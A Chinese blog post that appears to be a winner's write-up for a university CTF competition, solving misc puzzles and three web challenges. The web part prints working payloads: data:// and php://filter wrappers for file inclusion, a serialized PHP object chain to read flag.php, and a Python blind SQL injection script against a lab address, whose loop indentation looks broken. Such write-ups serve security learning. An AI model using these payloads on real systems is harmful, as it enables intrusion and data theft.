第一届山城杯大学生网络安全技能联赛CTF赛
|
791
|
0
|
比赛WP

383 字
|
7 分钟

侥幸拿了第一,感觉题目就是新生赛难度,没啥难的,难受的就是线下打的时候是断网的,而且只有三个小时。

MISC

签到

010 editor打开就是flag

流量

导出所有http文件,找到666.zip,解压后得到1.txt,2.txt,3.txt,4.txt,5.txt,6.txt

cat *> flag.txt

保存到一个文件里,然后010editor打开,很明显是一个png文件,改后缀打开是一个二维码,扫了就是flag

电台情歌

提取出来得到:

316639323362393(9,-2,3)233386436343062623864616437(3,-1,9)613263343338626433

去掉负的就是

316639323362393233386436343062623864616437613263343338626433

hex解码一下得到1f923b9238d640bb8dad7a2c438bd3,包上flag{}就是flag

WEB

two

 <?php

highlight_file(__FILE__);
error_reporting(0);
include("ans.php");

if(isset($_GET["one"]) && isset($_GET["two"]) && isset($_POST["three"]))
{
    $one = $_GET["one"];
    $two = $_GET["two"];

    $three = $_POST["three"];
    if(!empty($one) && !empty($two) && !empty($three))
    {
        if(file_get_contents($two) === "g00dJ0b" and file_get_contents($three) ===  "onTh1s")
        {
            echo "bypass";
            var_dump($one);
            include($one);
        }
    }
    else
        die("Insufficient Parameters");
}

先data伪协议绕过file_get_contents($two) === “g00dJ0b”与file_get_contents($three) === “onTh1s”,然后file协议读取flag即可

?two=data://text/plain;base64,ZzAwZEowYg==&one=php://filter/read=convert.base64-encode/resource=ans.php
POST three=data://text/plain;base64,b25UaDFz&one=

php

<?php
error_reporting(0);
highlight_file(__FILE__);
$from = $_GET['from'];
$to = $_GET['to'];
if(!isset($from) or !isset($to) or stripos($from, "flag")!=FALSE)
{
$from = "behind.php";
}
include($from);// read flag.php
if(isset($to))
{
$a = unserialize($to);
$a->sayTheFlag();
}

发现直接通过include()不可能直接读取到flag.php,所以我们读一下behind.php

?from=php://filter/read=convert.base64-encode/resource=behind.php
&to=123

base64解码一下:

<?php
error_reporting(0);
class Test
{
public $notthis;
public $variable;
public function __call($t1, $t2)
{
print($this->notthis);
}
}
class NoUse
{
public $notthis;
public $class;
public function __toString()
{
return file_get_contents($this->notthis);
}
}
?>

很简单的pop:

<?php
error_reporting(0);
class Test
{
public $notthis;
public $variable;
}
class NoUse
{
public $notthis;
public $class;
}
$a = new Test;
$b = new NoUse;
$b->notthis = 'flag.php';
$a->notthis = $b;
echo serialize($a);
#O:4:"Test":2:{s:7:"notthis";O:5:"NoUse":2:
{s:7:"notthis";s:8:"flag.php";s:5:"class";N;}s:8:"variable";N;}
?>
?from=behind.php
&to=O:4:"Test":2:{s:7:"notthis";O:5:"NoUse":2:
{s:7:"notthis";s:8:"flag.php";s:5:"class";N;}s:8:"variable";N;}

源码里就是flag

SQL

用%0c替换空格,用or盲注即可

import requests
import string
flag=''
url='http://192.168.10.165:58003/?id='
for i in range(1,50):
    for j in range(40,127):
        #print(1)
        #payload="0'%0cor%0c(substr(database(),{},1)='{}')".format(i,a)
        #print(a)
        payload="0'%0cor%0cif((ascii(substr((select%0cF1ag%0cfrom%0cTheFl4g),{},1))={}),1,0)%0c".format(i,j)
        payload=payload+"%23"
    res=requests.get(url=url+payload)
    if "Zhangsan" in res.text:
        flag+=chr(j)
        print(flag)
        break

print(flag)
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇